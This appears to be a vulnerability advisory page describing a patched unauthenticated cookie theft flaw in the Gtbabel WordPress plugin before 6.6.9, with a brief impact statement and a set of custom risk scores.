Primary

Context

Gtbabel WordPress Plugin Unauthenticated Cookie Theft Vulnerability

Vulnerability

Patched

A vulnerability exists in the Gtbabel WordPress plugin in versions prior to 6.6.9. The issue arises because the plugin does not verify that the URL for code analysis belongs to the user's blog. This flaw could enable unauthenticated attackers to steal cookies from logged-in users, including administrators, by having them open a malicious URL. The analysis request would then inadvertently include those cookies.

Impact

Exploitation of this vulnerability could lead to unauthorized access to a user's session, allowing an attacker to impersonate the user, such as an admin.

Added: Jun 9, 2025, 7:46 PM

Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread

1.0

impact

6.7

exploitability

7.9

remediation

7.7

relevance

0.0

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

1.0

impact

6.7

exploitability

7.9

remediation

7.7

relevance

0.0

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Gtbabel WordPress Plugin Unauthenticated Cookie Theft Vulnerability

Vulnerability

Impact

Affected Products

Gtbabel

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating